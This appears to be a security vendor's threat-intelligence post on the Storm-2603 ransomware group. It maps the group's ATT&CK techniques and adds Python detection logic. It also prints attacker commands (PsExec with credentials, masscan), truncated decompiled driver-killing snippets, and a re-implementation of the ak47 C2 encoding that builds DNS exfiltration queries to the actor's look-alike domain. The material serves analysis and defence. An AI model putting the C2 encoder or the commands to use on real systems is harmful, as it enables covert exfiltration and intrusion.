Storm-2603 Ransomware Campaign Targets Microsoft SharePoint in 2025: Activity and TTP Analysis
Storm-2603 is a financially motivated threat actor that deploys ransomware, including LockBit Black and WarLock/X2anylock. Its operations were first observed against organizations in Latin America and the APAC region during the first half of 2025. Its most prominent activity to date began on July 18, 2025, when Microsoft identified Storm-2603 deploying ransomware after exploiting multiple on-premises Microsoft SharePoint Server vulnerabilities: CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771.
In the following sections, we review the historical and significant activities attributed to Storm-2603, provide a detailed breakdown of the group's Tactics, Techniques, and Procedures (TTPs), and conclude with how organizations can continuously validate their security controls against this threat actor and identify exploitable gaps with the Picus Platform.
History & Major Activities of Storm-2603 Group
- First Half of 2025 - According to VirusTotal data analyzed by Check Point Research, Storm-2603 likely targeted organizations in Latin America while simultaneously attacking organizations in the APAC region [1].
- 18 July 2025 - Microsoft reported that Storm-2603 had deployed ransomware by exploiting multiple on-premises SharePoint Server vulnerabilities, specifically CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771 [2].
ATT&CK Mapping (TTPs) of Storm-2603 Group
Tactic: Initial Access
T1190 Exploit Public-Facing Application
Storm-2603 gains initial access by exploiting on-premises Microsoft SharePoint Server through the exploit chain tracked as "ToolShell", which combines CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771 [1], [2]. The chain is exploited against internet-facing servers without prior authentication, so an unpatched on-premises SharePoint instance exposed to the internet is the entry point; patching and reducing exposure are the primary controls [2].
Tactic: Execution
T1569.002 System Services: Service Execution
Storm-2603 uses PsExec, a legitimate command-line tool from the Microsoft Sysinternals suite, for remote execution [1]. Adversaries frequently abuse PsExec to interact with other systems, deploy malware, and run arbitrary commands across the network. PsExec works by copying its service binary to the target's ADMIN$ share and installing a temporary service (named PSEXESVC by default), so each use leaves service-installation and file-write traces on the remote host.
The command below uses PsExec to run whoami on the remote computer at 192.168.1.10, authenticating with the (example) credentials DOMAIN\AdminUser and password123:
psexec.exe \\192.168.1.10 -u DOMAIN\AdminUser -p password123 whoami
Tactic: Defense Evasion
T1562.001 Impair Defenses: Disable or Modify Tools
The actor employs the "Bring Your Own Vulnerable Driver" (BYOVD) technique to disable endpoint security products before deploying ransomware. Their custom tool, VMToolsEng.exe, loads a legitimately signed but vulnerable driver named ServiceMouse.sys (a renamed copy of AToolsKrnl64.sys) into the kernel. The driver exposes IOCTLs that perform privileged kernel actions on behalf of any user-mode caller, so the tool can use it to terminate antivirus processes and otherwise neutralize defenses [1]. Because the driver carries a valid signature, the load succeeds on systems that rely on signature checks alone; stopping it requires a driver blocklist (such as the Microsoft vulnerable driver blocklist) or monitoring of kernel-driver service creation.
The tool registers a service named ServiceMouse whose binary path points to the ServiceMouse.sys driver shipped in the package. The decompiled call that creates the service is shown below [1]:
hServicea = CreateServiceW(
After installing the service, the tool opens the driver's device and sends IO control code 0x99000050 to terminate a process by PID. The driver also exposes 0x990000D0 for deleting files and 0x990001D0 for uninstalling drivers. The snippets below show how the 0x99000050 request is issued from user mode and handled in the driver [1].
sub_14000C8C0((__int64)v8, InBuffer);
The code above shows how the IOCTL command 0x99000050 is sent [1].
case 0x9900050:
The above block is the driver-side dispatch that handles that IOCTL [1].
if ( CurrentProcessId_1 )
The last code snippet shows that the ZwTerminateProcess function is used for terminating processes [1].
T1574.001 Hijack Execution Flow: DLL
Storm-2603 leverages DLL search-order hijacking to launch its ransomware: a malicious library is placed next to a trusted, signed executable so that the application loads the attacker-controlled code. Documented pairings include MpCmdRun.exe with a spoofed Mpclient.dll to deliver Warlock, clink_x86.exe with a rogue clink_dll_x86.dll to deploy LockBit Black, and z.exe with a fake z.dll to launch x2anylock [1]. The technique abuses the Windows DLL search order, which resolves a library from the application's own directory before the system directories, so the payload runs under the identity and signature of a legitimate binary.
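The three host-level behaviours above (PsExec service installation, BYOVD driver registration and DLL search-order hijacking) all surface in the same two event sources, so one added detection example covers them. This is example code written for this page, not Picus's or the actor's tooling. The event records are constructed to look like simplified Windows System log Event ID 7045 (new service installed) and Sysmon Event ID 7 (image loaded) entries; the field names, the trusted-directory allow-list and the PSEXESVC default service name are assumptions to tune for your own telemetry.

```python
"""Added detection example (not Picus's or Storm-2603's code) for three of the
behaviours described above: PsExec service installation, BYOVD driver loading
and DLL search-order hijacking. Event records are constructed to resemble
simplified Windows 7045 and Sysmon Event ID 7 entries; field names and the
directory allow-list are assumptions to tune for your estate."""
from __future__ import annotations

import ntpath
from dataclasses import dataclass

# Assumption: illustrative allow-list of directories where a co-located DLL is expected.
TRUSTED_DIRS = (
    r"c:\windows\system32",
    r"c:\windows\syswow64",
    r"c:\program files",
    r"c:\program files (x86)",
    r"c:\programdata\microsoft\windows defender",  # legitimate home of MpCmdRun.exe/Mpclient.dll
)
DRIVER_DIR = r"c:\windows\system32\drivers"

# Executable/DLL pairs reported for Storm-2603 [1]; used only to label the alert.
KNOWN_SIDELOAD_PAIRS = {
    ("mpcmdrun.exe", "mpclient.dll"): "Warlock",
    ("clink_x86.exe", "clink_dll_x86.dll"): "LockBit Black",
    ("z.exe", "z.dll"): "x2anylock",
}


@dataclass
class Alert:
    rule: str
    host: str
    detail: str


def _dir(path: str) -> str:
    return ntpath.dirname(path.strip('"')).lower().rstrip("\\")


def _name(path: str) -> str:
    return ntpath.basename(path.strip('"')).lower()


def _in_trusted_dir(path: str) -> bool:
    d = _dir(path)
    return any(d == t or d.startswith(t + "\\") for t in TRUSTED_DIRS)


def check_service_install(ev: dict) -> Alert | None:
    """Event ID 7045 (new service installed): ServiceName, ImagePath, ServiceType."""
    name, image, stype = ev["ServiceName"], ev["ImagePath"], ev["ServiceType"]
    if name.lower() == "psexesvc":  # default service name PsExec installs on the remote host
        return Alert("psexec_service", ev["Host"], f"PsExec service installed: {image}")
    if "kernel mode driver" in stype.lower() and _dir(image) != DRIVER_DIR:
        # BYOVD: a kernel driver registered from a user-writable location
        return Alert("byovd_driver", ev["Host"],
                     f"kernel driver service {name!r} loads {image} outside {DRIVER_DIR}")
    return None


def check_image_load(ev: dict) -> Alert | None:
    """Sysmon Event ID 7 (image loaded): Image is the process, ImageLoaded the DLL."""
    exe, dll = ev["Image"], ev["ImageLoaded"]
    if not dll.lower().endswith(".dll"):
        return None
    # Search-order hijack: DLL resolved from the EXE's own directory, outside trusted paths
    if _dir(exe) == _dir(dll) and not _in_trusted_dir(dll):
        family = KNOWN_SIDELOAD_PAIRS.get((_name(exe), _name(dll)))
        tag = f" (matches reported {family} loader)" if family else ""
        return Alert("dll_sideload", ev["Host"], f"{exe} loaded {dll} from its own directory{tag}")
    return None


def run(events: list[dict]) -> list[Alert]:
    alerts = []
    for ev in events:
        if ev["EventID"] == 7045:
            alert = check_service_install(ev)
        elif ev["EventID"] == 7:
            alert = check_image_load(ev)
        else:
            alert = None
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample telemetry (not real logs).
SAMPLE_EVENTS = [
    {"EventID": 7045, "Host": "SP01", "ServiceName": "ServiceMouse",
     "ImagePath": r"C:\Users\Public\ServiceMouse.sys", "ServiceType": "kernel mode driver"},
    {"EventID": 7045, "Host": "FS02", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe", "ServiceType": "user mode service"},
    {"EventID": 7045, "Host": "FS02", "ServiceName": "CorpBackup",
     "ImagePath": r"C:\Windows\System32\drivers\corpbackup.sys", "ServiceType": "kernel mode driver"},
    {"EventID": 7, "Host": "SP01", "Image": r"C:\Users\Public\MpCmdRun.exe",
     "ImageLoaded": r"C:\Users\Public\Mpclient.dll"},
    {"EventID": 7, "Host": "WS07", "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},
    {"EventID": 7, "Host": "SP01", "Image": r"C:\Temp\z.exe", "ImageLoaded": r"C:\Temp\z.dll"},
]

if __name__ == "__main__":
    for a in run(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.host}: {a.detail}")
```

The sideload rule is deliberately generic (any DLL resolved from the executable's own directory outside trusted paths) and only uses the reported pairs to name the payload family, so a renamed loader still fires; the cost is that legitimate software installed to user-writable paths will also fire, which is why the allow-list must be tuned per environment. The BYOVD rule keys on where the driver file lives rather than on the ServiceMouse.sys name, since the actor already renamed AToolsKrnl64.sys once.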
Tactic: Discovery
T1046 Network Service Discovery
After gaining access, Storm-2603 uses masscan [1], a high-speed port scanner, to discover live hosts and open services across the internal network.
masscan -p80,443,22 192.168.1.0/24 --rate 100000 -oG output.grep
This command uses masscan to scan the 192.168.1.0/24 network for open ports 80, 443, and 22 at a rate of 100,000 packets per second, writing grepable output to output.grep. A rate that high is extremely noisy on an internal network and is a strong signal for network monitoring and IDS rules.
T1082 System Information Discovery
To gather host information, Storm-2603 employs SharpHostInfo [1], an open-source .NET tool that queries Windows hosts over the network to collect hostnames and domain membership details, helping the actor map the internal environment and choose targets for lateral movement.
SharpHostInfo.exe --all
This command runs SharpHostInfo to collect all of the host and domain details the tool can retrieve for the reachable systems.
Tactic: Command and Control
T1071.001 Application Layer Protocol: Web Protocols
The ak47c2 framework includes a C2 channel called ak47http, an HttpClient backdoor that communicates over plain HTTP. It sends a JSON object in the body of an HTTP POST request to the server's root path ("/"), with the payload obfuscated by first applying a simple XOR cipher using the static ASCII key "VHBD@H" and then converting the result to a hexadecimal string. The server responds with a similarly encoded JSON object whose cmd field provides the next instruction, which the implant executes with cmd.exe /c <command> 2>&1 before returning the output. Because the key is static and the channel is unencrypted, anyone holding a capture of the traffic can decode both sides of the exchange. A typical task request object follows this structure:
{"cmd":"","cmd_id":"","fqdn":"<computer>","result":"","type":"task"}
After the host runs a command, it returns the outcome labeled with the type "result" [1].
T1071.004 Application Layer Protocol: DNS
Storm-2603 operates a custom command-and-control framework, ak47c2, which includes a DNS tunneling client called ak47dns (dnsclient) that hides C2 traffic inside DNS TXT and MG record lookups to update.micfosoft[.]com, a Microsoft look-alike domain. Upon execution, the client hides its console, retrieves the host's computer name (falling back to unknown.local), generates a random five-character session ID, and constructs DNS queries that encode task or result tags, size flags, and the computer name. These elements are XOR-encoded with the ASCII key "VHBD@H", hex-encoded, concatenated with dots, and prepended to the C2 domain, using prefixes such as 1<sessionID> for task requests and 2<sessionID> for result uploads. For outputs exceeding 0xFF bytes, results are fragmented into 63-byte chunks (the maximum length of a DNS label) and sent with query labels that mark segmentation (s), the total segment count (t), and the current position (p). Both query types are given below [1]:
Query format used for outputs less than or equal to 0xFF bytes:
<task|result><sessionID>.a<sessionID>.<computerName>.update.micfosoft[.]com
Query format used for outputs larger than 0xFF bytes:
<task|result><sessionID>.s<sessionID>t<TOTAL>p<POS>.<segment1>.<segment2>.update.micfosoft[.]com
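Both ak47c2 channels above (ak47http POST bodies and ak47dns query names) share the same XOR-then-hex encoding, so one added example covers both: it builds the task JSON body, builds small and segmented DNS query names, and, for the defender's side, parses a query back and reassembles a segmented result. This is example code written for this page, not the actor's source. It assumes that the computer name and result bytes are the XOR/hex-encoded labels while the tag, session and size-flag labels stay literal as in the formats shown, that each 63-byte chunk is XOR-ed from key offset 0, that the JSON is serialized without spaces in the key order shown on the page, and that the small form carries no separate data label (the page does not describe one).

```python
"""Added re-implementation of the ak47c2 encoding described above (ak47http POST
bodies and ak47dns query names), written for this page; it is not the actor's
source. Assumptions: computer name and result bytes are the XOR/hex-encoded
labels, tag/session/size-flag labels stay literal, each chunk is XOR-ed from key
offset 0, and JSON uses the page's key order with no whitespace."""
import json
import random
import string

XOR_KEY = b"VHBD@H"                 # static key reported for both channels
C2_DOMAIN = "update.micfosoft.com"  # shown defanged on the page as micfosoft[.]com
CHUNK = 63                          # raw bytes per segmented query -> two 63-char hex labels
SMALL_LIMIT = 0xFF                  # larger outputs use the segmented form
TASK, RESULT = "1", "2"             # label prefixes for task requests / result uploads


def xor_hex_encode(data: bytes) -> str:
    """XOR with the repeating key, then hex (the order the page describes)."""
    return bytes(b ^ XOR_KEY[i % len(XOR_KEY)] for i, b in enumerate(data)).hex()


def xor_hex_decode(text: str) -> bytes:
    raw = bytes.fromhex(text)
    return bytes(b ^ XOR_KEY[i % len(XOR_KEY)] for i, b in enumerate(raw))


# ak47http: JSON object carried in the POST body to "/"
def http_task_request(fqdn: str) -> str:
    obj = {"cmd": "", "cmd_id": "", "fqdn": fqdn, "result": "", "type": "task"}
    return xor_hex_encode(json.dumps(obj, separators=(",", ":")).encode())


def http_decode(body: str) -> dict:
    """Defender side: undo hex and XOR on a captured body, then parse the JSON."""
    return json.loads(xor_hex_decode(body))


# ak47dns: query names under the C2 domain
def new_session_id() -> str:
    return "".join(random.choices(string.ascii_lowercase + string.digits, k=5))


def dns_small_query(kind: str, session: str, computer: str) -> str:
    """<task|result><sid>.a<sid>.<computerName>.<domain> (computer name encoded)."""
    return ".".join([kind + session, "a" + session, xor_hex_encode(computer.encode()), C2_DOMAIN])


def dns_result_queries(session: str, computer: str, output: bytes) -> list[str]:
    """One query for outputs <= 0xFF bytes, otherwise one query per 63-byte chunk."""
    if len(output) <= SMALL_LIMIT:
        return [dns_small_query(RESULT, session, computer)]
    chunks = [output[i:i + CHUNK] for i in range(0, len(output), CHUNK)]
    names = []
    for pos, chunk in enumerate(chunks):
        hexed = xor_hex_encode(chunk)    # <= 126 hex chars for a 63-byte chunk
        labels = [RESULT + session, f"s{session}t{len(chunks)}p{pos}", hexed[:63]]
        if hexed[63:]:
            labels.append(hexed[63:])    # <segment2>; every label stays <= 63 chars
        names.append(".".join(labels + [C2_DOMAIN]))
    return names


def parse_query(name: str) -> dict:
    """Decode one query name (e.g. from passive DNS logs) back into its fields."""
    labels = name.removesuffix("." + C2_DOMAIN).split(".")
    tag, sid = labels[0][0], labels[0][1:]
    rec = {"kind": "task" if tag == TASK else "result", "session": sid}
    flag = labels[1]
    if flag.startswith("a"):
        rec["computer"] = xor_hex_decode(labels[2]).decode()
    else:                                 # s<sid>t<TOTAL>p<POS>
        total, pos = flag[1 + len(sid):][1:].split("p")
        rec.update(total=int(total), pos=int(pos), data=xor_hex_decode("".join(labels[2:])))
    return rec


def reassemble(names: list[str]) -> bytes:
    """Rebuild a segmented result from its queries in any order; raise if a position is missing."""
    parts, total = {}, 0
    for rec in map(parse_query, names):
        if "pos" not in rec:
            raise ValueError("not a segmented result query")
        total = rec["total"]
        parts[rec["pos"]] = rec["data"]
    missing = [i for i in range(total) if i not in parts]
    if missing:
        raise ValueError(f"missing segments: {missing}")
    return b"".join(parts[i] for i in range(total))
```

For hunting, the useful properties are visible in the output of dns_result_queries: many queries to one apex domain whose second label starts with a or s followed by the same five-character session ID, and whose remaining labels are maximal-length hex strings. parse_query and reassemble show that a resolver log is enough to recover the exfiltrated command output once the static key is known.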
Tactic: Impact
T1486 Data Encrypted for Impact
The final objective for Storm-2603 is to deploy ransomware that encrypts critical files, thereby disrupting business operations to extort a payment. The group has been observed deploying at least two distinct ransomware families, LockBit Black and WarLock/X2anylock. Storm-2603 uses uniform ransom notes after encryption across its ransomware variants, differing mainly by file name. For x2anylock, the note is titled "How to decrypt my data.log", while for LockBit Black, it appears as "<Ransomware ID>.README.txt". Each note contains a brief message [1]:
Your decrypt ID: [redacted]
How Picus Simulates Storm-2603 Attacks
We also strongly suggest simulating Storm-2603 Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for Storm-2603:
| Threat ID | Threat Name | Attack Module |
| --- | --- | --- |
| 66538 | Storm-2603 Threat Group Campaign Malware Email Threat | Network Infiltration |
| 32466 | Storm-2603 Threat Group Campaign Malware Download Threat | Network Infiltration |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
References
[1] Check Point Research, "Before ToolShell: Exploring Storm-2603's Previous Ransomware Operations." Accessed: Oct. 19, 2025. [Online]. Available: https://research.checkpoint.com/2025/before-toolshell-exploring-storm-2603s-previous-ransomware-operations/
[2] Microsoft Threat Intelligence, "Disrupting active exploitation of on-premises SharePoint vulnerabilities," Microsoft Security Blog, Jul. 22, 2025. Accessed: Oct. 20, 2025. [Online]. Available: https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/